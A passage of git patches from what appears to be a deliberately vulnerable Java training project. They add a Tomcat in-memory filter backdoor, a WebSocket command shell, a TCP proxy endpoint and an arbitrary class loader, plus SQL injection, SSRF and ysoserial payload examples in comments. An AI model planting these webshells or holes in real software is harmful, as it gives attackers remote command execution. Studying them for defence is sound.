@@ -164,7 +164,7 @@ public static String Jsoup(String url) {
      */
     public static String okhttp(String url) throws IOException {
         OkHttpClient client = new OkHttpClient();
-        // client.setFollowRedirects(false);
+//         client.setFollowRedirects(false);
         com.squareup.okhttp.Request ok_http = new com.squareup.okhttp.Request.Builder().url(url).build();
         return client.newCall(ok_http).execute().body().string();
     }

From 9d66a8885aaf198a29602c7de1e45fba5a11a715 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Tue, 17 Jan 2023 14:40:29 +0800
Subject: [PATCH 091/108] add alibaba security purple team recruitment

---
 README.md    | 2 +-
 README_zh.md | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index c7e886a6..52642169 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
 
 Java sec code is a very powerful and friendly project for learning Java vulnerability code.
 
-[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md)
+[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md) 😋[Alibaba Security Purple Team Recruitment](https://talent.alibaba.com/off-campus-position/937731?trace=qrcode_share)
 
 ## Introduce
 
diff --git a/README_zh.md b/README_zh.md
index 549766a5..70e68837 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -2,7 +2,7 @@
 
 对于学习Java漏洞代码来说，`Java Sec Code`是一个非常强大且友好的项目。
 
-[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md)
+[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md) 😋[阿里集团安全紫军招聘](https://talent.alibaba.com/off-campus-position/937731?trace=qrcode_share)
 
 ## 介绍
 

From c3c41b44e0361b565bc945b106aeabc1676d30bd Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 23 Feb 2023 23:01:00 +0800
Subject: [PATCH 092/108] fix #25

---
 java-sec-code.iml                             |   2 +-
 pom.xml                                       |   6 +
 .../joychou/config/TomcatFilterMemShell.java  | 120 ++++++++++++++++
 .../joychou/config/WebSocketsCmdEndpoint.java |  46 +++++++
 .../config/WebSocketsProxyEndpoint.java       | 111 +++++++++++++++
 .../joychou/controller/ClassDataLoader.java   |  31 +++++
 .../org/joychou/controller/Deserialize.java   |  16 +--
 .../java/org/joychou/controller/Dotall.java   |   1 -
 .../java/org/joychou/controller/SQLI.java     |  73 +++++-----
 .../java/org/joychou/controller/SSRF.java     |  78 ++++++-----
 .../org/joychou/controller/WebSockets.java    |  76 +++++++++++
 src/main/java/org/joychou/controller/XXE.java |   3 +-
 .../joychou/security/WebSecurityConfig.java   |   7 +-
 .../joychou/security/ssrf/SSRFChecker.java    | 129 ++++++++++++++++--
 src/main/resources/application.properties     |  23 +++-
 15 files changed, 618 insertions(+), 104 deletions(-)
 create mode 100644 src/main/java/org/joychou/config/TomcatFilterMemShell.java
 create mode 100644 src/main/java/org/joychou/config/WebSocketsCmdEndpoint.java
 create mode 100644 src/main/java/org/joychou/config/WebSocketsProxyEndpoint.java
 create mode 100644 src/main/java/org/joychou/controller/ClassDataLoader.java
 create mode 100644 src/main/java/org/joychou/controller/WebSockets.java

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 9b423c61..6e093293 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -57,7 +57,6 @@
     <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf-spring4:2.1.5.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf:2.1.5.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: ognl:ognl:3.0.8" level="project" />
-    <orderEntry type="library" name="Maven: org.javassist:javassist:3.21.0-GA" level="project" />
     <orderEntry type="library" name="Maven: org.unbescape:unbescape:1.1.0.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: nz.net.ultraq.thymeleaf:thymeleaf-layout-dialect:1.4.0" level="project" />
     <orderEntry type="library" name="Maven: org.codehaus.groovy:groovy:2.4.7" level="project" />
@@ -222,5 +221,6 @@
     <orderEntry type="library" name="Maven: io.jsonwebtoken:jjwt:0.9.1" level="project" />
     <orderEntry type="library" name="Maven: com.auth0:java-jwt:4.0.0" level="project" />
     <orderEntry type="library" name="Maven: cn.hutool:hutool-all:5.8.10" level="project" />
+    <orderEntry type="library" name="Maven: org.javassist:javassist:3.27.0-GA" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 751a4b35..43c5b99a 100644
--- a/pom.xml
+++ b/pom.xml
@@ -306,6 +306,12 @@
             <version>5.8.10</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.27.0-GA</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/config/TomcatFilterMemShell.java b/src/main/java/org/joychou/config/TomcatFilterMemShell.java
new file mode 100644
index 00000000..be7a1b1c
--- /dev/null
+++ b/src/main/java/org/joychou/config/TomcatFilterMemShell.java
@@ -0,0 +1,120 @@
+package org.joychou.config;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+import java.lang.reflect.Field;
+import org.apache.catalina.core.StandardContext;
+import java.io.IOException;
+import org.apache.catalina.loader.WebappClassLoaderBase;
+import org.apache.tomcat.util.descriptor.web.FilterDef;
+import org.apache.tomcat.util.descriptor.web.FilterMap;
+import java.lang.reflect.Constructor;
+import org.apache.catalina.core.ApplicationFilterConfig;
+import org.apache.catalina.Context;
+import org.springframework.stereotype.Component;
+
+import javax.servlet.*;
+import java.util.*;
+
+@Component
+public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
+    static{
+        try {
+            System.out.println("Tomcat filter backdoor class is loading...");
+            final String name = "backdoorTomcatFilter";
+            final String URLPattern = "/*";
+
+            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
+            // standardContext为tomcat标准上下文，
+            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
+
+            Class<? extends StandardContext> aClass;
+            try{
+                // standardContext类名为TomcatEmbeddedContex，TomcatEmbeddedContext父类为StandardContext
+                // 适用于内嵌式springboot的tomcat
+                aClass = (Class<? extends StandardContext>) standardContext.getClass().getSuperclass();
+            }catch (Exception e){
+                aClass = standardContext.getClass();
+            }
+            Field Configs = aClass.getDeclaredField("filterConfigs");
+            Configs.setAccessible(true);
+            // 获取当前tomcat标准上下文中已经存在的filterConfigs
+            Map filterConfigs = (Map) Configs.get(standardContext);
+
+            // 判断下防止重复注入
+            if (filterConfigs.get(name) == null) {
+                // 构造filterDef，并将filterDef添加到standardContext的FilterDef中
+                TomcatFilterMemShell backdoorFilter = new TomcatFilterMemShell();
+                FilterDef filterDef = new FilterDef();
+                filterDef.setFilter(backdoorFilter);
+                filterDef.setFilterName(name);
+                filterDef.setFilterClass(backdoorFilter.getClass().getName());
+                standardContext.addFilterDef(filterDef);
+
+                // 构造fiterMap，将filterMap添加到standardContext的FilterMap
+                FilterMap filterMap = new FilterMap();
+                filterMap.addURLPattern(URLPattern);
+                filterMap.setFilterName(name);
+                filterMap.setDispatcher(DispatcherType.REQUEST.name());
+                standardContext.addFilterMapBefore(filterMap);
+
+                Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
+                constructor.setAccessible(true);
+                ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
+
+                // 最终将构造好的filterConfig存入StandardContext类的filterConfigs成员变量即可
+                filterConfigs.put(name, filterConfig);
+                System.out.println("Tomcat filter backdoor inject success!");
+            } else System.out.println("It has been successfully injected, do not inject again.");
+        } catch (Exception e) {
+            System.out.println(e.getMessage());
+        }
+    }
+
+
+    @Override
+    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+    }
+
+    @Override
+    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+    }
+
+    @Override
+    public void init(FilterConfig filterConfig) throws ServletException {
+
+    }
+
+    @Override
+    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
+        String cmd;
+        if ((cmd = servletRequest.getParameter("cmd_")) != null) {
+            Process process = Runtime.getRuntime().exec(cmd);
+            java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
+                    new java.io.InputStreamReader(process.getInputStream()));
+            StringBuilder stringBuilder = new StringBuilder();
+            String line;
+            while ((line = bufferedReader.readLine()) != null) {
+                stringBuilder.append(line).append('\n');
+            }
+            servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
+            servletResponse.getOutputStream().flush();
+            servletResponse.getOutputStream().close();
+            return;
+        }
+
+        filterChain.doFilter(servletRequest, servletResponse);
+    }
+
+
+    @Override
+    public void destroy() {
+
+    }
+
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/config/WebSocketsCmdEndpoint.java b/src/main/java/org/joychou/config/WebSocketsCmdEndpoint.java
new file mode 100644
index 00000000..ae4a0f1a
--- /dev/null
+++ b/src/main/java/org/joychou/config/WebSocketsCmdEndpoint.java
@@ -0,0 +1,46 @@
+package org.joychou.config;
+
+import javax.websocket.*;
+import java.io.InputStream;
+
+public class WebSocketsCmdEndpoint extends Endpoint implements MessageHandler.Whole<String> {
+    private Session session;
+
+    @Override
+    public void onOpen(Session session, EndpointConfig endpointConfig) {
+        this.session = session;
+        session.addMessageHandler(this);
+    }
+
+    @Override
+    public void onClose(Session session, CloseReason closeReason) {
+        super.onClose(session, closeReason);
+    }
+
+    @Override
+    public void onError(Session session, Throwable throwable) {
+        super.onError(session, throwable);
+    }
+
+    @Override
+    public void onMessage(String s) {
+        try {
+            Process process;
+            boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
+            if (bool) {
+                process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", s});
+            } else {
+                process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", s});
+            }
+            InputStream inputStream = process.getInputStream();
+            StringBuilder stringBuilder = new StringBuilder();
+            int i;
+            while ((i = inputStream.read()) != -1) stringBuilder.append((char) i);
+            inputStream.close();
+            process.waitFor();
+            session.getBasicRemote().sendText(stringBuilder.toString());
+        } catch (Exception exception) {
+            exception.printStackTrace();
+        }
+    }
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/config/WebSocketsProxyEndpoint.java b/src/main/java/org/joychou/config/WebSocketsProxyEndpoint.java
new file mode 100644
index 00000000..4c1f7710
--- /dev/null
+++ b/src/main/java/org/joychou/config/WebSocketsProxyEndpoint.java
@@ -0,0 +1,111 @@
+package org.joychou.config;
+
+import javax.websocket.Endpoint;
+import javax.websocket.EndpointConfig;
+import javax.websocket.MessageHandler;
+import javax.websocket.Session;
+import java.io.ByteArrayOutputStream;
+import java.net.InetSocketAddress;
+import java.nio.ByteBuffer;
+import java.nio.channels.AsynchronousSocketChannel;
+import java.nio.channels.CompletionHandler;
+import java.util.HashMap;
+import java.util.concurrent.Future;
+import java.util.concurrent.TimeUnit;
+
+public class WebSocketsProxyEndpoint extends Endpoint {
+    long i = 0;
+    ByteArrayOutputStream baos = new ByteArrayOutputStream();
+    HashMap<String, AsynchronousSocketChannel> map = new HashMap<String, AsynchronousSocketChannel>();
+
+    static class Attach {
+        public AsynchronousSocketChannel client;
+        public Session channel;
+    }
+
+    void readFromServer(Session channel, AsynchronousSocketChannel client) {
+        final ByteBuffer buffer = ByteBuffer.allocate(50000);
+        Attach attach = new Attach();
+        attach.client = client;
+        attach.channel = channel;
+        client.read(buffer, attach, new CompletionHandler<Integer, Attach>() {
+            @Override
+            public void completed(Integer result, final Attach scAttachment) {
+                buffer.clear();
+                try {
+                    if (buffer.hasRemaining() && result >= 0) {
+                        byte[] arr = new byte[result];
+                        ByteBuffer b = buffer.get(arr, 0, result);
+                        baos.write(arr, 0, result);
+                        ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());
+                        if (scAttachment.channel.isOpen()) {
+                            scAttachment.channel.getBasicRemote().sendBinary(q);
+                        }
+                        baos = new ByteArrayOutputStream();
+                        readFromServer(scAttachment.channel, scAttachment.client);
+                    } else {
+                        if (result > 0) {
+                            byte[] arr = new byte[result];
+                            ByteBuffer b = buffer.get(arr, 0, result);
+                            baos.write(arr, 0, result);
+                            readFromServer(scAttachment.channel, scAttachment.client);
+                        }
+                    }
+                } catch (Exception ignored) {
+                }
+            }
+
+            @Override
+            public void failed(Throwable t, Attach scAttachment) {
+                t.printStackTrace();
+            }
+        });
+    }
+
+    void process(ByteBuffer z, Session channel) {
+        try {
+            if (i > 1) {
+                AsynchronousSocketChannel client = map.get(channel.getId());
+                client.write(z).get();
+                z.flip();
+                z.clear();
+            } else if (i == 1) {
+                String values = new String(z.array());
+                String[] array = values.split(" ");
+                String[] addrarray = array[1].split(":");
+                AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
+                int po = Integer.parseInt(addrarray[1]);
+                InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);
+                Future<Void> future = client.connect(hostAddress);
+                try {
+                    future.get(10, TimeUnit.SECONDS);
+                } catch (Exception ignored) {
+                    channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
+                    return;
+                }
+                map.put(channel.getId(), client);
+                readFromServer(channel, client);
+                channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
+            }
+        } catch (Exception ignored) {
+        }
+    }
+
+    @Override
+    public void onOpen(final Session session, EndpointConfig config) {
+        i = 0;
+        session.setMaxBinaryMessageBufferSize(1024 * 1024 * 20);
+        session.setMaxTextMessageBufferSize(1024 * 1024 * 20);
+        session.addMessageHandler(new MessageHandler.Whole<ByteBuffer>() {
+            @Override
+            public void onMessage(ByteBuffer message) {
+                try {
+                    message.clear();
+                    i++;
+                    process(message, session);
+                } catch (Exception ignored) {
+                }
+            }
+        });
+    }
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/ClassDataLoader.java b/src/main/java/org/joychou/controller/ClassDataLoader.java
new file mode 100644
index 00000000..acd4ff3f
--- /dev/null
+++ b/src/main/java/org/joychou/controller/ClassDataLoader.java
@@ -0,0 +1,31 @@
+package org.joychou.controller;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.context.request.RequestContextHolder;
+import org.springframework.web.context.request.ServletRequestAttributes;
+
+import javax.servlet.http.HttpServletRequest;
+
+public class ClassDataLoader {
+
+    protected final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+    @RequestMapping("/classloader")
+    public void classData() {
+        try{
+            ServletRequestAttributes sra = (ServletRequestAttributes) RequestContextHolder.getRequestAttributes();
+            HttpServletRequest request = sra.getRequest();
+            String classData = request.getParameter("classData");
+
+            byte[] classBytes = java.util.Base64.getDecoder().decode(classData);
+            java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
+            defineClassMethod.setAccessible(true);
+            Class cc = (Class) defineClassMethod.invoke(ClassLoader.getSystemClassLoader(), null, classBytes, 0, classBytes.length);
+            cc.newInstance();
+        }catch(Exception e){
+            logger.error(e.toString());
+        }
+    }
+}
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index 9531e980..1ca5ff43 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -29,17 +29,14 @@ public class Deserialize {
     protected final Logger logger = LoggerFactory.getLogger(this.getClass());
 
     /**
-     * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
-     * Add the result to rememberMe cookie.
-     * <p>
-     * http://localhost:8080/deserialize/rememberMe/vuln
+     * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64 <br>
+     * <a href="http://localhost:8080/deserialize/rememberMe/vuln">http://localhost:8080/deserialize/rememberMe/vuln</a>
      */
     @RequestMapping("/rememberMe/vuln")
     public String rememberMeVul(HttpServletRequest request)
             throws IOException, ClassNotFoundException {
 
         Cookie cookie = getCookie(request, Constants.REMEMBER_ME_COOKIE);
-
         if (null == cookie) {
             return "No rememberMe cookie. Right?";
         }
@@ -56,12 +53,9 @@ public String rememberMeVul(HttpServletRequest request)
     }
 
     /**
-     * Check deserialize class using black list.
-     * Or
-     * Update commons-collections to 3.2.2 or above.
-     * Serialization support for org.apache.commons.collections.functors.InvokerTransformer is disabled for security reasons.To enable it set system property 'org.apache.commons.collections.enableUnsafeSerialization' to 'true',but you must ensure that your application does not de-serialize objects from untrusted sources.
-     * <p>
-     * http://localhost:8080/deserialize/rememberMe/security
+     * Check deserialize class using black list. <br>
+     * Or update commons-collections to 3.2.2 or above.Serialization support for org.apache.commons.collections.functors.InvokerTransformer is disabled for security reasons.To enable it set system property 'org.apache.commons.collections.enableUnsafeSerialization' to 'true',but you must ensure that your application does not de-serialize objects from untrusted sources.<br>
+     * <a href="http://localhost:8080/deserialize/rememberMe/security">http://localhost:8080/deserialize/rememberMe/security</a>
      */
     @RequestMapping("/rememberMe/security")
     public String rememberMeBlackClassCheck(HttpServletRequest request)
diff --git a/src/main/java/org/joychou/controller/Dotall.java b/src/main/java/org/joychou/controller/Dotall.java
index d2dfc49d..f6746354 100644
--- a/src/main/java/org/joychou/controller/Dotall.java
+++ b/src/main/java/org/joychou/controller/Dotall.java
@@ -18,7 +18,6 @@ public class Dotall {
 
     /**
      * <a href="https://github.com/spring-projects/spring-security/compare/5.5.6..5.5.7">官方spring-security修复commit记录</a>
-     * 漏洞描述：h
      */
     public static void main(String[] args) throws Exception{
         Pattern vuln_pattern = Pattern.compile("/black_path.*");
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index 6682115c..be46f45b 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -6,10 +6,10 @@
 import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
-import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.web.bind.annotation.*;
 
+import javax.annotation.Resource;
 import java.sql.*;
 import java.util.List;
 
@@ -25,8 +25,10 @@
 @RequestMapping("/sqli")
 public class SQLI {
 
-    private static Logger logger = LoggerFactory.getLogger(SQLI.class);
-    private static String driver = "com.mysql.jdbc.Driver";
+    private static final Logger logger = LoggerFactory.getLogger(SQLI.class);
+
+    // com.mysql.jdbc.Driver is deprecated. Change to com.mysql.cj.jdbc.Driver.
+    private static final String driver = "com.mysql.cj.jdbc.Driver";
 
     @Value("${spring.datasource.url}")
     private String url;
@@ -37,15 +39,14 @@ public class SQLI {
     @Value("${spring.datasource.password}")
     private String password;
 
-    @Autowired
+    @Resource
     private UserMapper userMapper;
 
 
     /**
-     * Vuln Code.
-     * http://localhost:8080/sqli/jdbc/vuln?username=joychou
+     * <p>Sql injection jbdc vuln code.</p><br>
      *
-     * @param username username
+     * <a href="http://localhost:8080/sqli/jdbc/vuln?username=joychou">http://localhost:8080/sqli/jdbc/vuln?username=joychou</a>
      */
     @RequestMapping("/jdbc/vuln")
     public String jdbc_sqli_vul(@RequestParam("username") String username) {
@@ -77,7 +78,7 @@ public String jdbc_sqli_vul(@RequestParam("username") String username) {
 
 
         } catch (ClassNotFoundException e) {
-            logger.error("Sorry,can`t find the Driver!");
+            logger.error("Sorry, can't find the Driver!");
         } catch (SQLException e) {
             logger.error(e.toString());
         }
@@ -86,10 +87,9 @@ public String jdbc_sqli_vul(@RequestParam("username") String username) {
 
 
     /**
-     * Security Code.
-     * http://localhost:8080/sqli/jdbc/sec?username=joychou
+     * <p>Sql injection jbdc security code by using {@link PreparedStatement}.</p><br>
      *
-     * @param username username
+     * <a href="http://localhost:8080/sqli/jdbc/sec?username=joychou">http://localhost:8080/sqli/jdbc/sec?username=joychou</a>
      */
     @RequestMapping("/jdbc/sec")
     public String jdbc_sqli_sec(@RequestParam("username") String username) {
@@ -100,7 +100,7 @@ public String jdbc_sqli_sec(@RequestParam("username") String username) {
             Connection con = DriverManager.getConnection(url, user, password);
 
             if (!con.isClosed())
-                System.out.println("Connecting to Database successfully.");
+                System.out.println("Connect to database successfully.");
 
             // fix code
             String sql = "select * from users where username = ?";
@@ -122,7 +122,7 @@ public String jdbc_sqli_sec(@RequestParam("username") String username) {
             con.close();
 
         } catch (ClassNotFoundException e) {
-            logger.error("Sorry, can`t find the Driver!");
+            logger.error("Sorry, can't find the Driver!");
             e.printStackTrace();
         } catch (SQLException e) {
             logger.error(e.toString());
@@ -132,9 +132,8 @@ public String jdbc_sqli_sec(@RequestParam("username") String username) {
 
 
     /**
-     * http://localhost:8080/sqli/jdbc/ps/vuln?username=joychou' or 'a'='a
-     *
-     * Incorrect use of prepareStatement. prepareStatement must use ? as a placeholder.
+     * <p>Incorrect use of prepareStatement. PrepareStatement must use ? as a placeholder.</p>
+     * <a href="http://localhost:8080/sqli/jdbc/ps/vuln?username=joychou' or 'a'='a">http://localhost:8080/sqli/jdbc/ps/vuln?username=joychou' or 'a'='a</a>
      */
     @RequestMapping("/jdbc/ps/vuln")
     public String jdbc_ps_vuln(@RequestParam("username") String username) {
@@ -165,7 +164,7 @@ public String jdbc_ps_vuln(@RequestParam("username") String username) {
             con.close();
 
         } catch (ClassNotFoundException e) {
-            logger.error("Sorry, can`t find the Driver!");
+            logger.error("Sorry, can't find the Driver!");
             e.printStackTrace();
         } catch (SQLException e) {
             logger.error(e.toString());
@@ -175,10 +174,9 @@ public String jdbc_ps_vuln(@RequestParam("username") String username) {
 
 
     /**
-     * vuln code
-     * http://localhost:8080/sqli/mybatis/vuln01?username=joychou' or '1'='1
-     *
-     * @param username username
+     * <p>Sql injection of mybatis vuln code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/vuln01?username=joychou' or '1'='1">http://localhost:8080/sqli/mybatis/vuln01?username=joychou' or '1'='1</a>
+     * <p>select * from users where username = 'joychou' or '1'='1' </p>
      */
     @GetMapping("/mybatis/vuln01")
     public List<User> mybatisVuln01(@RequestParam("username") String username) {
@@ -186,17 +184,20 @@ public List<User> mybatisVuln01(@RequestParam("username") String username) {
     }
 
     /**
-     * vul code
-     * http://localhost:8080/sqli/mybatis/vuln02?username=joychou' or '1'='1' %23
-     *
-     * @param username username
+     * <p>Sql injection of mybatis vuln code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/vuln02?username=joychou' or '1'='1">http://localhost:8080/sqli/mybatis/vuln02?username=joychou' or '1'='1</a>
+     * <p>select * from users where username like '%joychou' or '1'='1%' </p>
      */
     @GetMapping("/mybatis/vuln02")
     public List<User> mybatisVuln02(@RequestParam("username") String username) {
         return userMapper.findByUserNameVuln02(username);
     }
 
-    // http://localhost:8080/sqli/mybatis/orderby/vuln03?sort=1 desc%23
+    /**
+     * <p>Sql injection of mybatis vuln code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/orderby/vuln03?sort=id desc--">http://localhost:8080/sqli/mybatis/orderby/vuln03?sort=id desc--</a>
+     * <p> select * from users order by id desc-- asc</p>
+     */
     @GetMapping("/mybatis/orderby/vuln03")
     public List<User> mybatisVuln03(@RequestParam("sort") String sort) {
         return userMapper.findByUserNameVuln03(sort);
@@ -204,10 +205,8 @@ public List<User> mybatisVuln03(@RequestParam("sort") String sort) {
 
 
     /**
-     * security code
-     * http://localhost:8080/sqli/mybatis/sec01?username=joychou
-     *
-     * @param username username
+     * <p>Sql injection mybatis security code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/sec01?username=joychou">http://localhost:8080/sqli/mybatis/sec01?username=joychou</a>
      */
     @GetMapping("/mybatis/sec01")
     public User mybatisSec01(@RequestParam("username") String username) {
@@ -215,9 +214,8 @@ public User mybatisSec01(@RequestParam("username") String username) {
     }
 
     /**
-     * http://localhost:8080/sqli/mybatis/sec02?id=1
-     *
-     * @param id id
+     * <p>Sql injection mybatis security code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/sec02?id=1">http://localhost:8080/sqli/mybatis/sec02?id=1</a>
      */
     @GetMapping("/mybatis/sec02")
     public User mybatisSec02(@RequestParam("id") Integer id) {
@@ -226,14 +224,19 @@ public User mybatisSec02(@RequestParam("id") Integer id) {
 
 
     /**
-     * http://localhost:8080/sqli/mybatis/sec03
+     * <p>Sql injection mybatis security code.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/sec03">http://localhost:8080/sqli/mybatis/sec03</a>
      */
     @GetMapping("/mybatis/sec03")
     public User mybatisSec03() {
         return userMapper.OrderByUsername();
     }
 
-
+    /**
+     * <p>Order by sql injection mybatis security code by using sql filter.</p>
+     * <a href="http://localhost:8080/sqli/mybatis/orderby/sec04?sort=id">http://localhost:8080/sqli/mybatis/orderby/sec04?sort=id</a>
+     * <p>select * from users order by id asc </p>
+     */
     @GetMapping("/mybatis/orderby/sec04")
     public List<User> mybatisOrderBySec04(@RequestParam("sort") String sort) {
         return userMapper.findByUserNameVuln03(SecurityUtil.sqlFilter(sort));
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index b4c4bde8..f28b8b91 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -34,11 +34,12 @@ public class SSRF {
     private HttpService httpService;
 
     /**
-     * http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd
-     *
-     * The default setting of followRedirects is true.
-     * Protocol: file ftp mailto http https jar netdoc
-     * UserAgent is Java/1.8.0_102.
+     * <p>
+     *    The default setting of followRedirects is true. <br>
+     *    Protocol: file ftp mailto http https jar netdoc. <br>
+     *    UserAgent is Java/1.8.0_102.
+     * </p>
+     * <a href="http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd">http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd</a>
      */
     @RequestMapping(value = "/urlConnection/vuln", method = {RequestMethod.POST, RequestMethod.GET})
     public String URLConnectionVuln(String url) {
@@ -90,9 +91,8 @@ public String httpURLConnectionVuln(@RequestParam String url) {
 
     /**
      * The default setting of followRedirects is true.
-     * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>.
-     *
-     * http://localhost:8080/ssrf/request/sec?url=http://test.joychou.org
+     * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>. <br>
+     * <a href="http://localhost:8080/ssrf/request/sec?url=http://test.joychou.org">http://localhost:8080/ssrf/request/sec?url=http://test.joychou.org</a>
      */
     @GetMapping("/request/sec")
     public String request(@RequestParam String url) {
@@ -108,12 +108,12 @@ public String request(@RequestParam String url) {
 
 
     /**
-     * Download the url file.
-     * http://localhost:8080/ssrf/openStream?url=file:///etc/passwd
-     * <p>
-     * new URL(String url).openConnection()
-     * new URL(String url).openStream()
-     * new URL(String url).getContent()
+     * Download the url file. <br>
+     * <code>new URL(String url).openConnection()</code>  <br>
+     * <code>new URL(String url).openStream()</code> <br>
+     * <code>new URL(String url).getContent()</code> <br>
+     * <a href="http://localhost:8080/ssrf/openStream?url=file:///etc/passwd">http://localhost:8080/ssrf/openStream?url=file:///etc/passwd</a>
+
      */
     @GetMapping("/openStream")
     public void openStream(@RequestParam String url, HttpServletResponse response) throws IOException {
@@ -179,12 +179,10 @@ public String okhttp(@RequestParam String url) {
 
     }
 
-
     /**
      * The default setting of followRedirects is true.
-     * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>.
-     *
-     * http://localhost:8080/ssrf/httpclient/sec?url=http://www.baidu.com
+     * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>. <br>
+     * <a href="http://localhost:8080/ssrf/httpclient/sec?url=http://www.baidu.com">http://localhost:8080/ssrf/httpclient/sec?url=http://www.baidu.com</a>
      */
     @GetMapping("/httpclient/sec")
     public String HttpClient(@RequestParam String url) {
@@ -204,8 +202,7 @@ public String HttpClient(@RequestParam String url) {
     /**
      * The default setting of followRedirects is true.
      * UserAgent is <code>Jakarta Commons-HttpClient/3.1</code>.
-     *
-     * http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com
+     * <a href="http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com">http://localhost:8080/ssrf/commonsHttpClient/sec?url=http://www.baidu.com</a>
      */
     @GetMapping("/commonsHttpClient/sec")
     public String commonsHttpClient(@RequestParam String url) {
@@ -223,9 +220,8 @@ public String commonsHttpClient(@RequestParam String url) {
 
     /**
      * The default setting of followRedirects is true.
-     * UserAgent is the useragent of browser.
-     *
-     * http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com
+     * UserAgent is the useragent of browser.<br>
+     * <a href="http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com">http://localhost:8080/ssrf/Jsoup?url=http://www.baidu.com</a>
      */
     @GetMapping("/Jsoup/sec")
     public String Jsoup(@RequestParam String url) {
@@ -244,9 +240,8 @@ public String Jsoup(@RequestParam String url) {
 
     /**
      * The default setting of followRedirects is true.
-     * UserAgent is <code>Java/1.8.0_102</code>.
-     *
-     * http://localhost:8080/ssrf/IOUtils/sec?url=http://www.baidu.com
